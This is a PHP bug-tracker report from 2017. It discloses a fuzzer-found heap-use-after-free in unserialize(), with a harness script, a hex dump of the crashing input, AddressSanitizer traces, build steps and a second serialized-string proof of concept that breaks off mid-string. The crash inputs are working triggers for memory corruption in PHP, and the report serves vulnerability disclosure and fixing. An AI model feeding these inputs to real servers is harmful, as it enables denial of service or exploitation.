Sec Bug #74609 a heap-use-after-free was found at zif_unserialize function
Submitted: 2017-05-18 06:31 UTC Modified: 2017-08-12 13:14 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: varsleak at gmail dot com Assigned:
Status: Duplicate Package: *General Issues
PHP Version: 7.1.6 OS: Ubuntu 1604 & Windows10
Private report: No CVE-ID: None
 [2017-05-18 06:31 UTC] varsleak at gmail dot com
Description:
------------
It was found by AFL.

Test script:
---------------
<?php
	if ($argc != 2) {
		fwrite(STDERR, "usage: {$argv[0]} path/to/data\n");
		exit(1);
	}
	// Feed the raw fuzzer-generated bytes straight to unserialize() (this is "line 7" in the warnings below)
	$poc = unserialize(file_get_contents($argv[1]));
?>

data:
4F 3A 38 3A 22 73 74 64 43 6C 61 73 73 22 3A 31
3A 7B 69 3A 30 3B 4F 3A 31 32 3A 22 44 61 74 65
49 6E 74 65 72 76 61 7A 22 3A 33 30 32 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 35 3A 7B 73 3A
31 3A 22 79 22 3B 69 3A 30 30 3B 73 3A 31 3A 22
86 22 3B 69 3A 30 3B 73 3A 31 3A 22 64 22 3B 69
3A 30 30 30 36 30 30 3B 73 3A 31 3A 22 79 22 3B
64 3A 38 36 32 30 31 30 36 30 30 30 30 3B 73 3A
31 3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22
30 30 F2 30 64 61 79 22 3B 64 3A 30 30 30 30 32
30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 32 30 31 30 45
39 38 3B 73 3A 31 3A 22 69 22 3B 52 3A 30 37 3B
73 3A 31 3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37
3A 22 30 30 F2 30 64 61 79 22 3B 64 3A 30 30 30
30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 45
39 38 3B 73 3A 31 3A 22 7C 22 3B 69 3A 31 30 30
31 36 36 30 34 35 37 30 30 30 30 30 30 3B 73 3A
31 3A 22 73 22 3B 64 3A 38 36 32 30 30 30 30 30
30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 39 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 32 30 31 30 45 39 38 3B 73
3A 31 3A 22 69 22 3B 52 3A 2B 37 3B 73 3A 31 3A
22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22 30 30
F2 30 64 61 79 22 3B 64 3A 31 30 30 30 30 30 32
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 33 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 31 31 45 39 38 3B
73 3A 31 3A 22 69 22 3B 69 3A 31 30 30 30 3B 73
3A 31 3A 22 75 22 3B 69 3A 30 3B 73 3A 31 3A 22
64 22 3B 69 3A 30 30 3B 73 3A 31 3A 22 6D 22 3B
64 3A 38 36 32 30 31 30 45 39 38 3B 73 3A 31 3A
22 69 22 3B 69 3A 31 36 30 30 30 30 3B 73 3A 31
3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22 30
30 F2 30 64 61 79 22 3B 64 3A 30 30 30 30 30 30
32 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 32 30 31 30 45 39
38 3B 73 3A 31 3A 22 8C 22 3B 52 3A 30 34 3B 69
3A 30 3B 4F 3A 38 3A 22 73 74 64 43 6C 61 73 73
22 3A 33 31 3A 30 73 3A 31 3A 22 30 22 3B 61 3A
30 3A 7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31
3A 22 53 51 4C 69 74 65 33 D3 74 6D 74 22 3A 30
3A 7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A
22 53 51 4C 69 74 65 33 53 74 6D 74 22 3A 30 3A
7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A 22
53 51 4C 69 74 65 33 53 74 6D 74 22 3A 30 3A 7B
7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A 22 53
51 4C 69 74 65 33 53 74 6D 74 22 3A 34 33 31 3A
32 35 01 30 3B 73 3A 31 3A 22 6D 22 3B 54 3A 30
3B 73 3A 31 3A 22 64 22 3B 69 3A 30 30 39 30 36
38 30 36 30 35 3B 73 3A 31 3A 22 68 22 3B 69 3A
00 10 13 13 13 13 13 13 13 13 13 13 13 13 13 13
13 13 13 30 33 C1 33 33 33 33 33 30 44 30 30 30
32 30 30 33 33 33 33 33 33 33 33 33 33 33 38 3B
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 00 02 33 33 33 30 30 33 33 30 33
33 30 30 30 30 30 1D 25 30 30 4C 65 6E 67 74 68
45 78 63 65 70 74 69 6F 65 72 61 74 6F 72 49 74
65 72 61 44 4F 4D 43 6F 6D 6D 65 6E 74 74 6F 72
31 37 3A 22 66 00 72 64 30 79 30 30 30 22 30 30
30 31 30 30 30 3B 73 3A 34 3A 22 30 30 74 30 30
30 22 3B 69 3A 30 30 30 33 33 30 3B 73 3A 31 3A
22 64 22 3B 69 35 1B 30 33 33 30 30 69 30 30 3B
73 30 30 30 30 22 30 30 30 30 5F 30 30 30 63 30
30 30 30 72 30 30 30 30 30 76 30 22 30 30 3A 30
21 7D 30 30 6D 3A 30 3A 30 30 30 30 7D 73 3A 32
3A 22 30 30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72
3A 34 3B 7D 69 3A 30 3B 72 3A 36 3B 80 73 3A 32
3A 22 30 36 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72
3A 36 3B 7D 73 3A 32 3A 22 30 37 22 3B 61 3A 31
3A 7B 69 3A 30 3B 72 3A 36 3B 7D 73 3A 32 3A 22
30 38 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36
3B 7D 73 3A 32 3A 22 30 39 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 30 31 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 31 3B 7D 73 3A 33 3A 22 63 30
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 63 30 33 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 63 30
34 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 63 30 35 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
36 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 31 30 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
38 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 30 39 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 32
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 32 31 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 63 32
32 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 31 3A 22 64 22 3B 61 3A 31 3A 7B 69 3A
30 3B 72 3A 36 3B 7D 73 3A 31 3A 22 65 22 3B 69
3A 30 3B 73 3A 31 3A 22 66 22 3B 61 3A 32 33 3A
7B 69 3A 30 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A
36 3B 7D 69 3A 31 3B 61 3A 31 3A 7B 69 3A 30 3B
72 3A 36 3B 7D 69 3A 32 3B 61 3A 31 3A 7B 69 3A
30 3B 72 3A 36 3B 7D 69 3A 33 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 69 3A 34 3B 61 3A 31
3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69 3A 35 3B 61
3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69 3A 36
3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69
3A 37 3B 61 3A 31 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 3A 7B 69 3A 30 3B

Use 010 Editor to save this hex data to a file.

Expected result:
----------------
no crash.

Actual result:
--------------
USE_ZEND_ALLOC=1:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING


************************************************************************
USE_ZEND_ALLOC=0:

(The warnings and AddressSanitizer SEGV report printed for this run are byte-for-byte identical to the USE_ZEND_ALLOC=1 output above, down to process id 27059, and are not repeated here.)
➜  unserialize_workdir USE_ZEND_ALLOC=0 ../afl_php-7.1.3RC1 fuzz_php.php.bak syncdir/fuzzer2/crashes/id:000000,sig:06,src:003387+001233,op:splice,rep:2 
=================================================================
==14446==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019a28 at pc 0x000001826ed1 bp 0x7ffd7b3fac90 sp 0x7ffd7b3fac88
READ of size 1 at 0x612000019a28 thread T0
    #0 0x1826ed0 in zval_get_type /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18
    #1 0x1826ed0 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:637
    #2 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #3 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #4 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #5 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #6 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #7 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #8 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #9 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #10 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #11 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #12 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #13 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #14 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #15 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #16 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #17 0x7fd2393a582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

0x612000019a28 is located 104 bytes inside of 288-byte region [0x6120000199c0,0x612000019ae0)
freed by thread T0 here:
    #0 0x4f7380 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1a6b764 in _efree /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x4f7538 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x1a6c5b8 in __zend_malloc /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb2f0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb300: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb320: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb330: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb340: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb350: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==14446==ABORTING


 [2017-05-18 06:35 UTC] varsleak at gmail dot com
-Summary: a heap-buffer-overflow was found at zif_unserialize function +Summary: a heap-use-after-free was found at zif_unserialize function
 [2017-05-18 06:35 UTC] varsleak at gmail dot com
A heap-use-after-free vulnerability.
 [2017-05-18 06:56 UTC] whitehat002 at hotmail dot com
Is this the result of using the fuzz tool? How do you make sure it is a 'use after free' bug?
 [2017-05-18 10:16 UTC] varsleak at gmail dot com
This is the result of recompiling PHP-7.1.5 without modification:

➜  php-orig git:(PHP-7.1.5) ✗ ./configure --disable-shared --enable-static CFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CXXFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CC=clang CXX=clang++ LIBS="-lXpm"



➜  php-orig git:(PHP-7.1.5) ✗ USE_ZEND_ALLOC=0 sapi/cli/php ~/github/php-src-vul/heap-use-after-free/fuzzer.php ~/github/php-src-vul/heap-use-after-free/heap-use-after-free.data 
=================================================================
==29990==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019d28 at pc 0x0000015f54b6 bp 0x7ffcb6c37360 sp 0x7ffcb6c37358
READ of size 1 at 0x612000019d28 thread T0
    #0 0x15f54b5 in zval_get_type /home/varsleak/github/php-orig/Zend/zend_types.h:332:18
    #1 0x15fa035 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:637:6
    #2 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #3 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #4 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #5 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #9 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #10 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #11 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #12 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #13 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #14 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #15 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #16 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #17 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c298 in _start (/home/varsleak/github/php-orig/sapi/cli/php+0x43c298)

0x612000019d28 is located 104 bytes inside of 288-byte region [0x612000019cc0,0x612000019de0)
freed by thread T0 here:
    #0 0x4f6e40 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1864b39 in _efree /home/varsleak/github/php-orig/Zend/zend_alloc.c:2428:4
    #2 0x19df0af in zend_hash_do_resize /home/varsleak/github/php-orig/Zend/zend_hash.c:867:3
    #3 0x19c72c6 in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:590:2
    #4 0x19c7cf0 in _zend_hash_add_new /home/varsleak/github/php-orig/Zend/zend_hash.c:637:9
    #5 0x160320c in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:440:13
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #9 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #10 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #11 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #12 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #13 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #14 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #15 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #16 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #17 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #18 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #19 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #20 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 here:
    #0 0x4f6ff8 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x186570b in __zend_malloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2820:14
    #2 0x186485e in _emalloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2413:11
    #3 0x19bcb5e in zend_hash_real_init_ex /home/varsleak/github/php-orig/Zend/zend_hash.c:138:3
    #4 0x19c1227 in zend_hash_check_init /home/varsleak/github/php-orig/Zend/zend_hash.c:161:3
    #5 0x19c6b8b in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:551:3
    #6 0x19c81e7 in _zend_hash_str_update /home/varsleak/github/php-orig/Zend/zend_hash.c:651:14
    #7 0x15c567e in php_store_class_name /home/varsleak/github/php-orig/ext/standard/incomplete_class.c:159:2
    #8 0x15fd62f in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:985:3
    #9 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #10 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #11 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #12 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #13 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #14 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #15 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #16 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #17 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #18 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #19 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #20 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #21 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/php-orig/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb350: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb380: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb3a0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb3b0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb3c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29990==ABORTING
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
-Operating System: Test on Ubuntu 16.04 x64 +Operating System: Ubuntu 1604 & Windows10 -PHP Version: 7.1.5 +PHP Version: 7.1.6
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
Add new PoC:
<?php
    $crashed_data ='O:9:"AAAAAAAAA":1:0S:1:"0";a:15:{s:8:"AAAAAAAA";i:-0;s:1:"m";i:0;s:1:"d";i:0;s:1:"i";i:00;s:1:"i";i:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:123:{s:1:"y";i:2;s:8:"AAAAAAAA";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:8:"AAAAAAAA";d:000;s:1:"i";i:10;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:200000000000000000000000000000000:{s:1:"y";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:2:"Ad";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1: